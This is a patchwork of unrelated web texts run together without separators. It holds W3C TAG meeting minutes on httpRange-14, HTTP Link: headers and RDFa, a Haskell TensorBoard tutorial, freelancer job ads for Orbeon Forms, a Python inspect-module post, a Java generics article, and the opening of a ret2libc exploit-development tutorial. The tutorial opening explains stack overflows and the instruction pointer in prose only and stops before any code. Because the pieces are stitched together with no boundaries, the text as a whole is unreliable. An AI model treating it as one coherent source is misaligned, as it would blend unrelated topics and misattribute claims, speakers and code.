... What are the sources of descriptive information (link header, link element from HTML, 303 content location...)
... Question of coherence between representations.
... (Do English and French versions "say" the same thing?)
... Assessing the correctness of a mirror.
... I've got some links that I'll provide.
NM: I think there's been some scope creep. I thought it was going to be very narrowly focused, but there seems to be some much broader goals in some minds.
<DanC_lap> (fwiw, re caching, I presented at a WWW9 workshop in 2000, based on the 1994 caching paper by Luotonen and Altis. )
JR: I think it would be nice to deliver something, and the mechanics are interesting for some applications, but on the other hand, if I don't have a little more guidance of when 200 responses are acceptable, I won't have gotten much out of it.
TimBL: What scope creep?
NM: I actually said ambiguity. I thought it was going to be about mechanics, but there are bigger issues and they're all connected.
<DanC_lap> (more work, nov 2003 )
HT: RFC 2616 puts you very close to httpRange-14.
JR: Semantic web kicks you even further. I think "what is an information resource" is a red herring, the question is, when can I give a 200 response.
<DanC_lap> (and I saw FRBR came up in awwsw email... "I suggest adopting w:InformationResource rdfs:subClassOf frbr:Work as a practical constraint." -- my IRW 2006 paper )
JR outlines the contributions from different individuals:
scribe: David Booth's RDF capturing httpRange-14
... A use case presenting ambiguity between XML document IDs and an RDF person.
... Jonathan's category diagram
<DanC_lap> example: foo#xyz where foo has an XML representation with id="xyz", hence foo#xyz identifies part of an XML document; meanwhile, foo#xyz is claimed to identify a person.
scribe: Question of how FRBR ontologies line up with the other discussions in the group.
... (exploring the neighborhoods of 200's)
<DanC_lap> timbl, a frbr citation:
JR: The information resource question comes to me because I want to know if someone gets a 200 for a journal article, can I use that for provenance, or do I have to setup a separate URI which 303's.
<DanC_lap> crud; doesn't cite the main FRBR work
<DanC_lap> aha...
<DanC_lap> [IFLA]
<DanC_lap> K.G. Saur IFLA Study Group on the Functional Requirements for Bibliographic Records. Functional Requirements for Bibliographic Records: Final Report. UBCIM Publications-New Series. Vol. 19, Munchen: , 1998.
JR: The question of "time" comes up periodically, but we're trying to keep that out of scope.
<DanC_lap>
Some discussions and general agreement that it's sometimes necessary to model time but is very hard.
DanC: Is there light at the end of the tunnel?
JR: No.
NM: I think the elephant in the room is "what is an information resource"?
DanC: Is there a critical need?
JR: I want to know if I can return a 200 for a journal article.
DanC: "Yes"
JR: I'd like to be able to answer questions like that without questioning you and TimBL.
NM: We may all be happy with that answer, but there are others who aren't.
Some discussion of "what is an information resource"
<DanC_lap> HT raises a point of order whether that's what we're discussing; SKW suggests no, come to the AWWSW meetings to do that, which meeting participants are satisfied with
JR: Maybe in six months we'll have a draft.
<DanC_lap> tbl, please put some stuff in a la "presented at a TAG meeting May 2008"
HT: I am often a fan of putting rat hole inducing topics to one side in the hopes it'll go away. I fear that the information resource question is not such a topic.
... The AWWSW group has to give some sort of concrete answer to the question of what does a 200 mean.
... If not in the actual ontology, then in good, English-language prose to that effect.
<DanC_lap> (and I saw FRBR came up in awwsw email... "I suggest adopting w:InformationResource rdfs:subClassOf frbr:Work as a practical constraint." -- my IRW 2006 paper )
More discussion ensues.
<ht> 'my' as in DanC ?
<DanC_lap> yes
<ht> 'I' also DanC?
<ht> (in "I suggest")
<DanC_lap> DanC: I suggest finding several examples to bound InformationResource above and below; e.g. frbr:Work
<DanC_lap> (yes)
TimBL: Another practical question: what can you deduce from relationships like when you get a 302 or conneg.
... Should you perceive that all these things are the same resource?
<ht> Note that I'm happy with what I believe to be the current state of the AWWSW emerging consensus that there is no class in the ontology named Resource
TimBL: So I added a new relationship, "same-work-as", so in the FRBR area I think we'll find web resources that are the same work.
... That came up recently in running code.
<timbl_> Noah,
Moving on to "redirections57"...
->
There's a document coming out in June; they'd like to say something about the link: header.
JR: If the TAG can't find an answer in time, or doesn't like it, what then?
... in that case, they'll move it to the non-normative section.
TimBL: Can we do a straw poll?
Pretty much a three-way split: in-favor, not-in-favor, undecided.
HT: I've stated my concern before: I don't want unsolicited metadata.
TimBL: What are the other concerns?
<scribe> Chair: TimBL
DanC: My concern is the relationships; are they managed in URIs or shortnames or...
JR: That's all resolved in the latest drafts.
NM: I have vague concerns, but they're not crisp enough to drive the group in any direction.
<DanC_lap> (right; so falling back to HTTP 1.0 doesn't address my concern about relationship names)
Stuart: Is Henry's concern one of taste or style or is it actively harmful?
HT: Consumption of bandwidth is the leading term. The second part is that I'm concerned it's the thin end of a very long wedge.
... Header information needs to be very carefully considered. How many times have we had filesystems that say
... there's a data fork and a resource fork. We're going to distinguish between the message and what it's about.
... It's never worked well.
... It makes me very happy to keep the separable stuff as small as possible. We already have the problem that files don't tell you their media types.
... Now we're adding more important metadata that we won't get from file: URIs.
<Zakim> DanC_lap, you wanted to suggest bounding the class InformationResource above and below
Stuart: Is this a way of encoding metadata in the Link: header or a way of pointing to metadata?
HT: The concern is that it's the thin end of a long wedge.
Stuart: I don't want to encourage putting a whole RDF graph in the link headers.
<noah> I'm curious whether Henry is ultimately concerned about message size, or something deeper
TimBL: I like link: header *for* the bandwidth issue. Instead of having things creep into other headers, all sorts of metadata can go in a server-generated virtual document.
... For people who really care about the metadata, they can follow the link. For others, it won't be clogging the bandwidth.
... I agree that the resource fork file architecture is sub-optimal. If it really were a resource fork then I'd see that as a bad thing.
... But the problem with the resource fork is you wind up with two open commands, one to open the data and one to do both.
... The resource fork isn't a first-class file. The link: header is just a pointer to a file.
<DanC_lap> (I wonder what contemporary web mirroring tools do with mime types... if I have foo.html with content-type: image/gif and I copy it with wget, does it lose the image/gif media type? I bet it does)
TimBL: The resource fork is more like GETMETA.
HT: I think there are three classes, link:, GETMETA, or systematically manipulating the URI.
... Only the third has any possible way of being extended to file: URIs.
... But it's a lot easier to start a server running these days.
... I have some sympathy with the systematic URI manipulation.
... If the question was called, I wouldn't object.
AM: There are lots of different styles of metadata.
... Are you not happy because its one link for different kinds of metadata?
HT: Yes, I think that's what Tim's point just now was.
... This is as far as you get, no farther. Everything else has to leverage this.
... I don't know if this is good or not.
JR: You could go even further and just have a single "Resource-Description:" header.
HT: I didn't realize that there were going to be lots of link: headers.
... I want to say "no" to that on the same grounds.
DanC: If people fall back to HTTP 1.1 then they won't get those bits.
JR: It's a separate RFC so it could be applied to different versions.
Some discussion of the Atom/Link header registry
Further discussion of a small technical error about the use of .../link-relationships.html# as the base URI for Link: headers
->
<timbl_> ACTION: dan to report Relationship values are URIs that identify the type of link. If the relationship is a relative URI, its base URI MUST be considered to be "", and the value MUST be present in the link relation registry. is a bug to the relevant bug sink fro [recorded in]
<trackbot-ng> Created ACTION-153 - Report Relationship values are URIs that identify the type of link. If the relationship is a relative URI, its base URI MUST be considered to be \"\", and the value MUST be present in the link relation registry. is a bug to the relevant bug sink fro [on Dan Connolly - due 2008-05-27].
JR: The question isn't settled. I find Henry convincing, but then I think about the scenarios and what's to be said to Phil and I'm not so sure.
... The situation that brought this to my mind was a lot of documents that have metadata (lab reports, etc.) and where do you put it?
... That question is going to remain for me and the link: header is a convenient answer for a lot of administrators.
<Zakim> Stuart, you wanted to say that there can be more than one link; and to say that link is already regarded as being there.
Stuart: There can be multiple link: headers and they can be distinguished so that you can tell what link will give you WSDL and what one will give you POWDER, etc.
... Roy would say that the link: header has always been there, what Mark has done is ground the relationships in URI space.
Timbl: They can also be pushed into a single link header with commas.
... This seems like the sort of thing that the TAG should really put its weight behind.
... There are a whole lot of things that would be made easier and it's a lever that would allow lots of innovation.
... What can we do to promote it?
JR: I'm reluctant without convincing the naysayers.
TimBL: No, what would we do if we wanted to.
JR: I think just a simple statement of support would be enough.
NM: Maybe the question is, are there strong naysayers on the outside.
JR: Yes there are
NM: So we need to either convince them or convince the people who will convince them.
JR: Do you want to go through the issues list?
Stuart: We're into break time.
<timbl_> Proposal2: The TAG recommends the use and standardization of the HTTP Link: header as described in
<DanC_lap> issues in
DanC: I think we should take 30 seconds and see if anyone has any of these issues they think is critical.
The group pauses to read the issues at the end of the uniform-access document.
<DanC_lap> #3 #
<DanC_lap> # Mechanisms that require special server configuration may not be accessible to all author/publishers; there will be an interaction with the way content is hosted and so on.
HT: I think 3 (mechanisms that require server configuration) is hugely important; I just want to emphasize that.
TimBL: I think we need to address that as a separate TAG issue. It's important, but we should try to get ISPs to provide more control.
DanC: You think this is a critical stopper for link:?
HT: I don't know. Many of the alternatives have this problem.
<Zakim> DanC_lap, you wanted to ask for a refined poll... not just "who likes link?" but "who finds Link to be a cost-effective solution to the powder use case? grddl? mobile bp?
DanC: If you fix the bug with the hash, then the URI relationships become information resources.
TimBL: So we should note that IANA will have to run a 303.
... But that will be useful for a lot of reasons.
TimBL highlights proposal2 above.
JR: it has to be strongly qualified
DanC: Doesn't the draft enumerate the qualifications?
... I'd like to see it used for bibliographic metadata for immutable files, POWDER, etc.
... We shouldn't recommend technology for technologies sake, we should name the use cases that it addresses.
HT: Is anyone actively championing alternatives?
<DanC_lap> I'm happy with Link for powder, grddl, and metadata for immutable files
JR: MGET has been implemented
TimBL: ... scribe missed the other example ...
DanC: There's PROPFIND, but that's not being recommended here.
Some discussion of the benefits of manipulating the URI, a la adding ",about" or /about/
<timbl_> Proposal3: The TAG recommends the use, for POWDER and metadata about fixed resources, and GRDDL transformation links; and standardization of the HTTP Link: header as described in
<timbl_> Proposal4: The TAG recommends the use, for example for POWDER and metadata about fixed resources, and GRDDL transformation links; and standardization of the HTTP Link: header as described in.
TimBL: Should we run the link: header on w3.org?
<timbl_> should the w3 now run this on w3.org? ,meta and link header for the w3.org site
<timbl_> for: ACL info, conneg variants, ...
Dan and TimBL to discuss that offline.
NM: Previously, I had prepared a draft for Vancouver. I got a mix of reactions.
... I republished a draft that included a number of substantive comments from the last review.
... I believe that's all I've changed in this draft.
... Some highlights:
... I've promoted the RDFa material up to its own chapter
... I put in the picture that TimBL prepared of the web's standard retrieval mechanism in an appendix, after prose introduction in the text
<timbl_> The image needs a width=100% OWTTE
NM: Added principles to motivate good practices.
... I killed a few GPNs.
<DanC_lap> (hmm... the TOC lists microformats as an example of "RDF and the Self-Describing Web"; the community seems to be divided on that... ah... the text doesn't assume consensus)
<timbl_> Noah, do you have a pointer to the original PNG?
NM: The RDFa task force has sent an informal response that we should deal with.
... That's my brain dump on what's changed. I think it's ready to ship except for some RDFa details and some editorial work on the diagram.
Stuart: Can we get explicit actions to review the draft?
<DanC_lap> (I read a previous draft pretty carefully; I'm sorta used up as a reviewer)
<scribe> ACTION: Norman to review The Self-Describing Web, either the 12 May draft or the draft that comes out of this meeting [recorded in]
<trackbot-ng> Created ACTION-155 - Review The Self-Describing Web, either the 12 May draft or the draft that comes out of this meeting [on Norman Walsh - due 2008-05-27].
<scribe> ACTION: Stuart to review The Self-Describing Web, either the 12 May draft or the draft that comes out of this meeting [recorded in]
<trackbot-ng> Created ACTION-156 - Review The Self-Describing Web, either the 12 May draft or the draft that comes out of this meeting [on Stuart Williams - due 2008-05-27].
The group reads section 5.1 Using RDFa to produce self-describing HTML
NM: One of the RDFa TF comments is that RDFa only applies to XHTML. So I plan to fix that by changing all the references here to HTML.
<noah>
DanC: I think the sentence that begins "Even though..." is wrong
NM: I meant that historically, if you were developing an RDF app, you didn't need to read HTML and now you do.
TimBL: This is an example of a design question. The fragment of HTML isn't self-describing until one of two things happens:
... 1. Revise the media type so that it references RDF
... 2. Assume that GRDDL is part of the core and add a GRDDL transformation
NM: Ok, what I'm hearing is that this sentence should be deleted or restated to address Dan's concern.
... What I'd like to do is go through these two points a little bit methodically to make sure that I understand their concern and the relevant background.
... Come out of today with a story of what they could have done, what they did, and then go back and revisit the first sentence.
... So, "The last paragraph reads in part "For this example document to be self-describing, the pertinent media type and the specifications on which it depends must provide for the use of RDFa in XHTML; at the time of this writing, they do not.""
"The XHTML 2 Working Group disagrees with this statement"
Some discussion of with what they are disagreeing.
General agreement: You can't have action at a distance. The assertion that you're a member of the family isn't enough, the *actual mime type* has to point explicitly to the members of its family.
NM: There are three markers you can use to say that this is not any old HTML.
DanC: Ok, so tell the follow-your-nose story with one of these.
NM: One of the ways you can go forward is with a DTD
TimBL: Take out the DTD.
DanC: You can't, because that's part of the spec.
TimBL: The DTD is required?
NM: It's a SHOULD
->
->
Some discussion of whether or not they have an example without a document type declaration.
DanC: If you're going to tell the follow-your-nose story with DTDs, good luck getting it past me and Tim, but otherwise you should remove it.
JR: Why do you so badly need to know there's RDFa in it?
DanC: You need the follow your nose story so that you can license the assertions in the document.
NM: Let me see if I can summarize: the relevant base spec does refer to the profile attribute, therefore we can tell the follow-your-nose story with that.
... DTDs do various things, but they aren't part of that story.
... The @version attribute recommended in the new editor's draft isn't part of the follow your nose story either.
... There are two possible paths: they could revise their spec, but let's assume they won't.
... Section 4.1 of the latest RDFa draft specifies that there are three mechanisms to indicate that a document is RDFa enhanced.
... Of these, only one, the profile attribute, is useful to make the document self describing.
<timbl_> I note that <title>My home-page</title>
<timbl_> <meta property="dc:creator" content="Mark Birbeck" />
<timbl_> <link rel="foaf:workplaceHomepage" href="" />
<timbl_> is a FOAF error. The foaf:workplaceHomepage property I think links a person and a home page, not a home page and a home page, no?
<timbl_> ------
NM: because the @profile is specifically referenced as an extension mechanism in the core specs.
... the others aren't self describing.
<timbl_> (above bug was in)
DanC: I don't think that's a helpful way to tell the story.
Stuart: There's more than one follow-your-nose story. Perhaps we're getting confused.
NM: I thought TimBL offered a third choice that they don't mention, GRDDL.
Stuart draws a diagram
application/xhtml+xml -> RFC 3236 -> HTML M12N -> -> RDFa specification
HT: That namespace document doesn't actually refer to the RDFa specification yet, but it does say it might.
Some discussion about whether or not the MIME type specification actually gives you enough information to follow your nose.
It's not as crisp as one might like, but arguably works.
"... RFC 3236. However, it should suffice for now for the purposes of interoperability that user agents accepting 'application/xhtml+xml' content use the user agent conformance rules in [XHTML1]."
From which we get from the MIME type to the namespace document.
By way of M12N.
NM: I'll revisit the sentence "Even though this..." in 5.1 of Self Describing Web and redraft.
... And pull the DOCTYPE
Stuart: So you're going to redraft?
NM: As I said, I think it's pretty good except for the RDFa stuff and now I can fix that.
Some discussion of how to respond to the RDFa email message.
<Zakim> timbl_, you wanted to sggest remove doctype and to ask what the follow your nose algo *is* here in RDFa, the section seems to duck the issue
<Zakim> DanC_lap, you wanted to note HTML 5 editor doesn't consider GRDDL nor RDF relevant to design of HTML 5
DanC: The HTML 5 editor doesn't consider GRDDL nor RDF relevant to the design of HTML 5. HTML5 has no @profile.
<DanC_lap>
<DanC_lap> Ian Hickson's rationale for not including profile, in full, seems to only be in the whatwg archive
DanC: I disagree with him on an architectural basis, but I can't argue with the fact that lots of authors won't use @profile.
TimBL: Leaving these things out prevents smaller communities from innovating.
... The RDF community would like a profile so that they can use HTML in the ways that they want, even though they are a minority community.
DanC: "But RDF is not relevant to real life"
TimBL: That's just socially inappropriate.
Some discussion of how best this argument could be phrased.
Stuart: There were topics we wanted to come back to, how should we adjust our agenda for tomorrow?
<DanC_lap> I heard tim give a little bit of something new: "to ignore the overlap between the RDF and HTML communities is unacceptable"
NM: I believe that XHTML says it may sometimes be necessary to deliver it with text/html. Furthermore, lots of it is delivered that way.
... I tried to cover follow-your-nose from text/html.
DanC: You can't.
NM: So I could just leave it out, or I could say why text/html doesn't work.
DanC: I kind of like the profile story
TimBL: But there are lots of reasons why the RDFa folks don't want to do that.
... The story I think we should tell is that text/html is a poor person's XML and the implicit namespace for text/html documents is the XHTML namespace.
... The other way is to make the RDFa spec part of the core
Scribe note: this is a third option from Tim's earlier list
<DanC_lap> (a point I noted earlier: Ian Hickson: For example, in most of about a billion pages I hit in 2005 I found that the html 4 profile attribute was used in about 1.4 million pages... which sounds like a lot, until you realize that the dc.title in the <meta> element, which you should always use with the profile attribute, was used about 19 million times. So 1.4 million times we use profile ever, and 19 million times we use dc.title, just one of any number of values that requires the profile attribute. So that's 10 times more times we use the extension mechanism than we use the extension declaration it wants. -- )
Some more discussion of the text/html media type.
DanC: The text of the text/html media type spec probably hasn't caught up with current understanding.
NW: I think you could just leave it out.
NM: But there's a lot of XHTML that's served as text/html
NW: I still think you could just leave it out.
Some discussion of the editorial mods needed to the graphic.
<DanC_lap> (what was that address, timbl?)
<timbl_> ( , danc)
Stuart: What was the outcome of the @profile discussion?
DanC: You're all notified and I might follow up with TimBl. I accepted that there was no action following.
Stuart: There were a few things to potentially revisit:
... XML Versioning
... Distributed extensibility
... URNs and Registries
<DanC_lap> agenda order is 15, 16, 13, 14
<DanC_lap> agenda order is 12
<DanC_lap> agenda order is 12, 15, 16, 13
Adjourned for the day
<DanC_lap> scribe editing: HT for day 1, Norm for day 2, Noah for day 3
Last week we built our first neural network and used it on a real machine learning problem. We took the Iris data set and built a classifier that took in various flower measurements. It determined, with decent accuracy, the type of flower the measurements referred to.
But we’ve still only seen half the story of Tensor Flow! We’ve constructed many tensors and combined them in interesting ways. We can imagine what is going on with the “flow”, but we haven’t seen a visual representation of that yet.
We’re in luck though, thanks to the Tensor Board application. With it, we can visualize the computation graph we've created. We can also track certain values throughout our program run. In this article, we’ll take our Iris example and show how we can add Tensor Board features to it. Here's the Github repo with all the code so you can follow along!
Add an Event Writer
The first thing to understand about Tensor Board is that it gets its data from a source directory. While we’re running our system, we have to direct it to write events to that directory. This will allow Tensor Board to know what happened in our training run.
eventsDir :: FilePath
eventsDir = "/tmp/tensorflow/iris/logs/"

runIris :: FilePath -> FilePath -> IO ()
runIris trainingFile testingFile =
  withEventWriter eventsDir $ \eventWriter -> runSession $ do
    ...
By itself, this doesn’t write anything down into that directory though! To understand the consequences of this, let’s boot up tensor board.
Running Tensor Board
Running our executable again doesn't bring up Tensor Board. It merely logs the information that Tensor Board uses. To actually see that information, we'll run the tensorboard command.

>> tensorboard --logdir='/tmp/tensorflow/iris/logs'
Starting TensorBoard 47 at
Then we can point our web browser at the correct port. Since we haven't written anything to the file yet, there won't be much for us to see other than some pretty graphics. So let's start by logging our graph. This is actually quite easy! Remember our model? We can use the logGraph function combined with our event writer so we can see it.

model <- build createModel
logGraph eventWriter createModel
Now when we refresh Tensor Board, we'll see our system's graph.
What the heck is going on here?
But, it’s very large and very confusing. The names of all the nodes are a little confusing, and it’s not clear what data is going where. Plus, we have no idea what’s going on with our error rate or anything like that. Let’s make a couple adjustments to fix this.
Adding Summaries
So the first step is to actually specify some measurements that we'll have Tensor Board plot for us. One node we can use is a "scalar summary". This provides us with a summary of a particular value over the course of our training run. Let's do this with our errorRate node. We can use the simple scalarSummary function.

errorRate_ <- render $ 1 - (reduceMean (cast correctPredictions))
scalarSummary "Error" errorRate_
The second type of summary is a histogram summary. We use this on a particular tensor to see the distribution of its values over the course of the run. Let's do this with our second set of weights. We need to use readValue to go from a Variable to a Tensor.

(finalWeights, finalBiases, finalResults) <-
  buildNNLayer numHiddenUnits irisLabels rectifiedHiddenResults
histogramSummary "Weights" (readValue finalWeights)
So let's run our program again. We would expect to see these new values show up under the Scalars and Histograms tabs in Tensor Board. But they don't. This is because we still need to write these results to our event writer. And this turns out to be a little complicated. First, before we start training, we have to create a tensor representing all our summaries.

logGraph eventWriter createModel
summaryTensor <- build mergeAllSummaries
Now if we had no placeholders, we could run this tensor whenever we wanted, and it would output the values. But our summary tensors depend on the input placeholders, which complicates the matter. So here's what we'll do. We'll only write out the summaries when we check our error rate (every 100 steps). To do this, we have to change our error rate in the model to take the summary tensor as an extra argument. We'll also have it add a ByteString as a return value to the original Float.

data Model = Model
  { train :: TensorData Float -> TensorData Int64 -> Session ()
  , errorRate :: TensorData Float -> TensorData Int64 -> SummaryTensor
               -> Session (Float, ByteString)
  }
Within our model definition, we'll use this extra parameter. It will run both the errorRate_ tensor AND the summary tensor together with the feeds:

return $ Model
  { train = ...
  , errorRate = \inputFeed outputFeed summaryTensor -> do
      (errorTensorResult, summaryTensorResult) <- runWithFeeds
        [ feed inputs inputFeed
        , feed outputs outputFeed
        ]
        (errorRate_, summaryTensor)
      return (unScalar errorTensorResult, unScalar summaryTensorResult)
  }
Now we need to modify our calls to errorRate below. We'll pass the summary tensor as an argument, and get the bytes as output. We'll write it to our event writer (after decoding), and then we'll be done!

-- Training
(err, summaryBytes) <- (errorRate model) trainingInputs trainingOutputs summaryTensor
let summary = decodeMessageOrDie summaryBytes
liftIO $ putStrLn $ "Current training error " ++ show (err * 100)
logSummary eventWriter (fromIntegral i) summary
liftIO $ putStrLn ""

-- Testing
let (testingInputs, testingOutputs) = convertRecordsToTensorData testRecords
(testingError, _) <- (errorRate model) testingInputs testingOutputs summaryTensor
liftIO $ putStrLn $ "test error " ++ show (testingError * 100)
Now we can see what our summaries look like by running tensor board again!
Scalar Summary of our Error Rate
Histogram summary of our final weights.
Annotating our Graph
Now let’s look back to our graph. It’s still a bit confusing. We can clean it up a lot by creating “name scopes”. A name scope is part of the graph that we set aside under a single name. When Tensor Board generates our graph, it will create one big block for the scope. We can then zoom in and examine the individual nodes if we want.
We'll make three different scopes. First, we'll make a scope for each of the hidden layers of our neural network. This is quite easy, since we already have a function for creating these. All we have to do is make the function take an extra parameter for the name of the scope we want. Then we wrap the whole function within the withNameScope function.

buildNNLayer :: Int64 -> Int64 -> Tensor v Float -> Text
             -> Build (Variable Float, Variable Float, Tensor Build Float)
buildNNLayer inputSize outputSize input layerName = withNameScope layerName $ do
  weights <- truncatedNormal (vector [inputSize, outputSize]) >>= initializedVariable
  bias <- truncatedNormal (vector [outputSize]) >>= initializedVariable
  let results = (input `matMul` readValue weights) `add` readValue bias
  return (weights, bias, results)
We supply our name further down in the code:

(hiddenWeights, hiddenBiases, hiddenResults) <-
  buildNNLayer irisFeatures numHiddenUnits inputs "layer1"
let rectifiedHiddenResults = relu hiddenResults
(finalWeights, finalBiases, finalResults) <-
  buildNNLayer numHiddenUnits irisLabels rectifiedHiddenResults "layer2"
Now we'll add a scope around all our error calculations. First, we combine these into an action wrapped in withNameScope. Then, observing that we need the errorRate_ and train_ steps, we return those from the block. That's it!

(errorRate_, train_) <- withNameScope "error_calculation" $ do
  actualOutput <- render $ cast $ argMax finalResults (scalar (1 :: Int64))
  let correctPredictions = equal actualOutput outputs
  er <- render $ 1 - (reduceMean (cast correctPredictions))
  scalarSummary "Error" er
  let outputVectors = oneHot outputs (fromIntegral irisLabels) 1 0
  let loss = reduceMean $ fst $ softmaxCrossEntropyWithLogits finalResults outputVectors
  let params = [hiddenWeights, hiddenBiases, finalWeights, finalBiases]
  tr <- minimizeWith adam loss params
  return (er, tr)
Now when we look at our graph, we see that it’s divided into three parts: our two layers, and our error calculation. All the information flows among these three parts (as well as the "Adam" optimizer portion).
Much Better
Conclusion
By default, Tensor Board graphs can look a little messy. But by adding a little more information to the nodes and using scopes, you can paint a much clearer picture. You can see how the data flows from one end of the application to the other. We can also use summaries to track important information about our graph. We’ll use this most often for the loss function or error rate. Hopefully, we'll see it decline over time.
Next week we’ll add some more complexity to our neural networks. We'll see new tensors for convolution and max pooling. This will allow us to solve the more difficult MNIST digit recognition problem. Stay tuned!
If you’re itching to try out some Tensor Board functionality for yourself, check out our in-depth Tensor Flow guide. It goes into more detail about the practical aspects of using this library. If you want to get the Haskell Tensor Flow library running on your local machine, check it out! Trust me, it's a little complicated, unless you're a Stack wizard already!
And if this is your first exposure to Haskell, try it out! Take a look at our guide to getting started with the language!
Orbeon review jobs
I need a Java OSS project installed to demo it. The Project is Orbeon forms ([login to view URL]) and I have a trial license file to install the PE version ([login to view URL]). I'll provide you with new VPS to work on, If you can complete today please reply with your proposed price. Thanks, Mika
I am looking for a senior Orbeon expert with solid experience in the Orbeon XForms builder, Orbeon integration with MySQL, Orbeon FormRunner, wizard view, and Orbeon integration with web services. You have to be able to connect with Skype or TeamViewer to participate in problem solving and analysis and help developers to proceed. Please send me your hourly rate
To be built: an advanced form builder based on XForms (e.g. Orbeon Forms) for a PHP5 application. It must be possible to create a form document from a template (headers, footers, tables, descriptions, etc.), for example the VAT7 form, with additional support for user validation beyond what XForms provides.
Need an Orbeon Form developer to develop an online form platform
The API should be able to be told how many clones it would like to make, create the clones in 12-second intervals, and be given sequential ordering of the clones once created. The clones will be of a form template created in Orbeon.
You must have the development skills to use Orbeon Forms to custom-make webforms, adding "signature inscribing" (writing) ability onto the webforms. Orbeon uses Java, Scala, JavaScript, CoffeeScript, XForms, XSLT, and XML technologies. You must be able to customise Orbeon Forms according to my liking in the back-end
...extending our Alfresco 4.2 CE portal and adding some additional functionality. This consists of integrating an XForms system with the existing Alfresco site/database (i.e. the Orbeon persistence layer), customizing some existing Alfresco Add-Ons (Surveys / Multi-Question Polls) and creating some custom workflows (conditional workflows based on user actions)
...org/MarkUp/Forms/ <[login to view URL]> Maybe you can find inspiration in the Orbeon Forms implementation (Java, available on GitHub) <[login to view URL]> <[login to view URL]> <[login to view URL]> I would like it to be seamless if
...server with a MySQL database; Orbeon is also required to be installed on the server and as a Liferay portlet. Spagic must work with Orbeon forms within Liferay, too. The provider must have experience deploying Spagic with MySQL and Orbeon as a Liferay portlet, and also in configuring Spagic to work with Orbeon forms within the Liferay portlet. So proper
I am short on time and need to prepare a PowerPoint presentation of XForms interacting with a jBPM workflow running in JBoss. The presentation should create an Orbeon form from scratch, showing off the different options there are in the XForms editor. Also with regards to CSS stylesheets ... field dependencies, validations ... Form should at minimum contain
We need help to install the XForms tool Orbeon on our server. We will take a look at the product to see if we can use the product to develop forms for our customers.
...there that might fill part of SharePoint's functionality. Alfresco (doc management) offers network share saving (not integrated into Office file-save though), Liferay (portal), Orbeon for forms functionality, Pentaho for BI and reporting, SugarCRM for data entry/lists. So it is actually possible to build similar functionality using OSS components, as I have
I need someone to install and configure the LifeRay portal ([login to view URL]) on my virtual server (Java, Tom...we learn from the experience and can do it again ourselves at additional domains. It is very likely we will need Portlet help in the future. We already know that the Orbeon xForms portlet, which we require, is not working at this point.
Experience and Skills required: XForms Orbeon Forms Apache Tomcat application server Apache Tomcat authentication experience eXist native XML database REST XQuery XPath XSLT XHTML XML namespaces CSS Very Basic Description: Take an existing, bare-bones
My friend Jacob Lundqvist of Galdrion today showed me a nifty little module I did not know about in Python, namely the inspect module. It allows you to find out the name of the method that called the method "you're in". Allow me to show an example:
import inspect

def foo():
    caller_module = inspect.stack()[1][1]
    caller_method = inspect.stack()[1][3]
    print caller_module, caller_method
    return "Something"

def bar():
    foo()

if __name__ == '__main__':
    bar()
And the result is:
>>> C:\Python23\dummy.py bar
I now use this in an internal debug method that prints all SQL statements used before being executed. Every method that needs to execute some SQL will always first send its SQL statement to the debug method. The debug method can now also show where the SQL came from. Great!
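Here's a minimal sketch of what such a debug method might look like (the name debug_sql and the output format are illustrative, not from my actual code):

import inspect

def debug_sql(sql):
    # stack()[1] is the caller's frame record:
    # index 1 is the file name, index 3 is the method name
    caller = inspect.stack()[1]
    print "SQL from %s %s(): %s" % (caller[1], caller[3], sql)

def fetch_users():
    sql = "SELECT * FROM users"
    debug_sql(sql)
    # ... execute the statement here ...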
Unlike JDK 1.4, Tiger isn't just a set of new standard libraries: it features actual changes to the language itself. Generics is the most profound of these changes. Long a part of advanced academic languages, this new feature is a welcome addition to Java.
This article introduces the new generics feature by examining Sun's example pre-release implementation. It demonstrates how to use generics in a sample program, an extensible networked multimedia framework (NMF). Finally, it goes over using generics in the Collections classes.
What Is Generics?
Generics is very similar to C++ templates, both in syntax and semantics. However, like most things in Java that are similar to C++, it is simpler. Since generics has a clear syntax, the following quick example will go a long way in explaining it:
public class Mailbox<Thing>
{
    private Thing thing;
    // ...
}
This is a fragment from the source code for NMF. The first thing you should notice is the "<Thing>" following the class name. This is a type parameter, which says you can create variations of the Mailbox class by providing different types to take the place of Thing. This means that Mailbox is a parametric class, a class that takes one or more parameters.
Thing isn't really a type or class; you haven't created a file called Thing.java that contains a class definition for Thing. Rather, you'll have to supply something to take the place of Thing. Here's how you instantiate the parametric class:
Mailbox<String> myMailbox = new Mailbox<String>();
Now Mailbox<String> is clearly the full name for a Java type. It means "the Mailbox class, with Thing replaced by String." You could also use Mailbox<URL>, which would be "the Mailbox class, with Thing replaced by URL."
In NMF, a Mailbox is an object that lets you send and receive messages of different types. A Mailbox<URL>, for example, lets you send and receive URLs, while a Mailbox<String> lets you send and receive Strings.
The nice thing about this is that you don't have to create two different classes to send and receive two different kinds of messages. Instead, you can create a single class, parameterized by the type variable Thing. You simply program this class to send and receive Things. Instantiating the Mailbox class with various types replaces the Thing type variable with actual types such as String and URL.
After a long hiatus, we shall once again emerge from the shadowy depths of the internet to build an exploit. This time, we'll be looking at how to defeat a non-executable stack by using the ret2libc technique — a lean, mean, and brilliant way of exploiting a stack overflow vulnerability.
Since it has been so long since we last built an exploit together, it might be a good idea to review a few key topics to developing exploits, such as what a stack overflow vulnerability is and what is the instruction pointer. So make sure to go over that stuff below before jumping to Step 1 of this exploit development tutorial.
What Is a Stack Overflow Vulnerability?
A stack overflow vulnerability occurs when a program improperly allocates memory for a variable on the stack. For instance, let's say we set aside 16 bytes of memory for a variable called "movieName." We spend hours devising an intuitive system where users can enter in the name of a movie to store it in this variable, and it looks beautiful. We have created the most gorgeous input box known to man.
This input we created becomes useless, however, because we completely forget to check if the user is inputting a movie name that is longer than 16 bytes (or 16 characters). One user inputs an obnoxiously long title such as "The Emperor's New Groove," and our whole program breaks! This happens because the user input exceeds the 16 bytes of memory we allocated for it and overflows into memory meant to contain other variables or data. Gross.
As a hacker, however, these sorts of vulnerabilities can be super useful. If we can keep track of what data we're overwriting, and what new data we are replacing it with, we could gain a lot of control. Enter the instruction pointer.
What Is the Instruction Pointer?
The instruction pointer, also known as EIP, contains the memory address of the next instruction to execute. If we were able to overwrite EIP with our own memory address, we could redirect code execution of the entire program. That sounds like fun. Of course, we can't review everything we've learned so far here, so check out the article linked below to re-learn the fundamental ideas that you'll need to finish this tutorial.
What's the Catch?
Of course, most programmers don't just say "oh well" and let us ruin their programs. Different strategies for protecting against stack overflow vulnerabilities have been devised. One particular strategy is to make sure the program knows not to execute any instructions that are located somewhere on the stack. This is a problem for us.
